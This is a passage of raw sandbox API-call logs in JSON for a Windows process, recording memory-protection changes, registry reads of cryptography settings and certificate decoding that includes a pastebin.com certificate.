"0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0ce9000" }, { "name": "ModuleName", "value": "CRYPT32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1693 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0ce9000" }, { "name": "ModuleName", "value": "CRYPT32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1694 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee14e6f25", "parentcaller": "0x7ffee14e4f88", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000178" }, { "name": "HandleName", "value": "\\Device\\KsecDD" }, { "name": "IoControlCode", "value": "0x00390400" }, { "name": "InputBuffer", "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00A\\x002\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffS\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00P\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00b\\x00c\\x00r\\x00y\\x00p\\x00t\\x00p\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00s\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1695 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffee14e1bc4", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "bcryptPrimitives.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1390000" }, { "name": "FunctionName", "value": "GetHashInterface" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee13a4460" } ], "repeated": 0, "id": 1696 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bb1210", "parentcaller": "0x7ffee0bac99e", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00000001" }, { "name": "Encoded", "value": "0\\x82\\x03\\xa60\\x82\\x03L\\xa0\\x03\\x02\\x01\\x02\\x02\\x11\\x00\\xfc_eMG\\x92\\xa06\\x0eoE4\\xb9\\xf3\\x11\\xe70\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x020;1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Google Trust Services1\\x0c0\n\\x06\\x03U\\x04\\x03\\x13\\x03WE10\\x1e\\x17\r251119161223Z\\x17\r260217171220Z0\\x171\\x150\\x13\\x06\\x03U\\x04\\x03\\x13\\x0cpastebin.com0Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04\t\\xd6\\xc7\\xed\\x85GCf\\x9b|p\\xd2\\x95\\xe4\\xfb\\x87\\xa8\\xb8\\xca\\x86E\\x1d5Qu7\\xdeA%\\xae\\x1cS\\x03\\x8b\\xa6\\xf7wT\\xfb\\xf9\\xa7Oh\\xe6,\\x8c l\\xcf\\x16\\xa2\\x1e)b\\xa8v%\\x88e\\xdbl\\x8c\\x80\\xe2\\xa3\\x82\\x02" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1697 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bb1210", "parentcaller": "0x7ffee0bac99e", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00000001" }, { "name": "Encoded", "value": "0\\x82\\x02\\x9f0\\x82\\x02%\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x7f\\xf3\\x19w\\x97,\"Jv\\x15]\\x13\\xb6\\xd6\\x85\\xe30\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x030G1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\"0 \\x06\\x03U\\x04\n\\x13\\x19Google Trust Services LLC1\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bGTS Root R40\\x1e\\x17\r231213090000Z\\x17\r290220140000Z0;1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Google Trust Services1\\x0c0\n\\x06\\x03U\\x04\\x03\\x13\\x03WE10Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04o\\xcd:\\xfegWGL!\\x03\\x85@\\xc2G]\\xbbXG\\x0f@" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1698 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bb1210", "parentcaller": "0x7ffee0bac99e", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00000001" }, { "name": "Encoded", "value": "0\\x82\\x03z0\\x82\\x02b\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x7f\\xe50\\xbf3\\x13C\\xbe\\xdd\\x82\\x16\\x10I=\\x8a\\x1b0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000W1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02BE1\\x190\\x17\\x06\\x03U\\x04\n\\x13\\x10GlobalSign nv-sa1\\x100\\x0e\\x06\\x03U\\x04\\x0b\\x13\\x07Root CA1\\x1b0\\x19\\x06\\x03U\\x04\\x03\\x13\\x12GlobalSign Root CA0\\x1e\\x17\r231115034321Z\\x17\r280128000042Z0G1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\"0 \\x06\\x03U\\x04\n\\x13\\x19Google Trust Services LLC1\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bGTS Root R40v0\\x10\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x05+" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1699 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffec7816000" }, { "name": "ModuleName", "value": "webio.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1700 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffec7816000" }, { "name": "ModuleName", "value": "webio.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1701 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bca81a", "parentcaller": "0x7ffee0bca5cf", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SYSTEM\\CurrentControlSet\\Services\\crypt32" }, { "name": "Handle", "value": "0x00000540" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\crypt32" } ], "repeated": 0, "id": 1702 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bca86c", "parentcaller": "0x7ffee0bca5cf", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000540" }, { "name": "ValueName", "value": "DiagLevel" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagLevel" } ], "repeated": 0, "id": 1703 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bca8bf", "parentcaller": "0x7ffee0bca5cf", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000540" }, { "name": "ValueName", "value": "DiagMatchAnyMask" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagMatchAnyMask" } ], "repeated": 0, "id": 1704 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bca8f8", "parentcaller": "0x7ffee0bca5cf", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000540" } ], "repeated": 0, "id": 1705 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bca600", "parentcaller": "0x7ffee0bba48e", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SYSTEM\\CurrentControlSet\\Services\\crypt32" }, { "name": "Handle", "value": "0x00000540" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\crypt32" } ], "repeated": 0, "id": 1706 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bca65d", "parentcaller": "0x7ffee0bba48e", "category": "registry", "api": "RegNotifyChangeKeyValue", "status": true, "return": "0x00000000", "arguments": [ { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\" }, { "name": "NotifyFilter", "value": "0x10000004" }, { "name": "WatchSubtree", "value": "0" }, { "name": "Asynchronous", "value": "1" } ], "repeated": 0, "id": 1707 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0ce9000" }, { "name": "ModuleName", "value": "CRYPT32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1708 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0ce9000" }, { "name": "ModuleName", "value": "CRYPT32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1709 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34e74ae", "parentcaller": "0x7ffee110dddb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1710 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34e74b7", "parentcaller": "0x7ffee110dddb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1711 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "4536", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d70000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1712 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10c54eb", "parentcaller": "0x7ffee0baa075", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1713 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee0baa0a1", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1714 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0b9c6e9", "parentcaller": "0x7ffee0b9c63d", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config" } ], "repeated": 0, "id": 1715 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0b9c682", "parentcaller": "0x7ffee0b9c60e", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "DisableSerialChain" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableSerialChain" } ], "repeated": 0, "id": 1716 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0b9c699", "parentcaller": "0x7ffee0b9c60e", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1717 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0ba21cf", "parentcaller": "0x7ffee0ba4357", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 1, "id": 1718 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0b9c6e9", "parentcaller": "0x7ffee0ba1baa", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config" } ], "repeated": 0, "id": 1719 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0b9fead", "parentcaller": "0x7ffee0b9ded9", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "CryptnetPreFetchTriggerPeriodSeconds" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\CryptnetPreFetchTriggerPeriodSeconds" } ], "repeated": 0, "id": 1720 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0b9fead", "parentcaller": "0x7ffee0b9def9", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "MaxUrlRetrievalByteCount" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxUrlRetrievalByteCount" } ], "repeated": 0, "id": 1721 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0ba176e", "parentcaller": "0x7ffee0ba16fe", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" } ], "repeated": 0, "id": 1722 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0b9e023", "parentcaller": "0x7ffee0b9e0d9", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000568" }, { "name": "ValueName", "value": "DisallowedCertSyncDeltaTime" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertSyncDeltaTime" } ], "repeated": 0, "id": 1723 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0ba16b2", "parentcaller": "0x7ffee0b9e125", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1724 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe549", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID" } ], "repeated": 0, "id": 1725 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe5c6", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "EncodingType 0" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0" } ], "repeated": 0, "id": 1726 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe5f4", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "EncodingType 0" }, { "name": "Handle", "value": "0x0000056c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0" } ], "repeated": 0, "id": 1727 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbec4c", "parentcaller": "0x7ffee0bbe6a7", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000056c" }, { "name": "SubKey", "value": "CertDllOpenStoreProv" }, { "name": "Handle", "value": "0x00000570" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv" } ], "repeated": 0, "id": 1728 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe781", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000570" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "#16" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\#16" } ], "repeated": 0, "id": 1729 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe7b1", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000570" }, { "name": "SubKey", "value": "#16" }, { "name": "Handle", "value": "0x00000574" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\#16" } ], "repeated": 0, "id": 1730 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe9c3", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000574" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "0" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "2" }, { "name": "MaxValueNameLength", "value": "8" }, { "name": "MaxValueLength", "value": "66" } ], "repeated": 0, "id": 1731 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbeac9", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000574" }, { "name": "Index", "value": "0" }, { "name": "ValueName", "value": "Dll" }, { "name": "Data", "value": "C:\\Windows\\System32\\cryptnet.dll" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\#16\\Dll" } ], "repeated": 0, "id": 1732 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbeac9", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000574" }, { "name": "Index", "value": "1" }, { "name": "ValueName", "value": "FuncName" }, { "name": "Data", "value": "LdapProvOpenStore" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\#16\\FuncName" } ], "repeated": 0, "id": 1733 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe88e", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000574" } ], "repeated": 0, "id": 1734 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe781", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000570" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "Ldap" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\Ldap" } ], "repeated": 0, "id": 1735 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe7b1", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000570" }, { "name": "SubKey", "value": "Ldap" }, { "name": "Handle", "value": "0x00000574" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\Ldap" } ], "repeated": 0, "id": 1736 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe9c3", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000574" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "0" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "2" }, { "name": "MaxValueNameLength", "value": "8" }, { "name": "MaxValueLength", "value": "66" } ], "repeated": 0, "id": 1737 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbeac9", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000574" }, { "name": "Index", "value": "0" }, { "name": "ValueName", "value": "Dll" }, { "name": "Data", "value": "C:\\Windows\\System32\\cryptnet.dll" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\Ldap\\Dll" } ], "repeated": 0, "id": 1738 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbeac9", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": 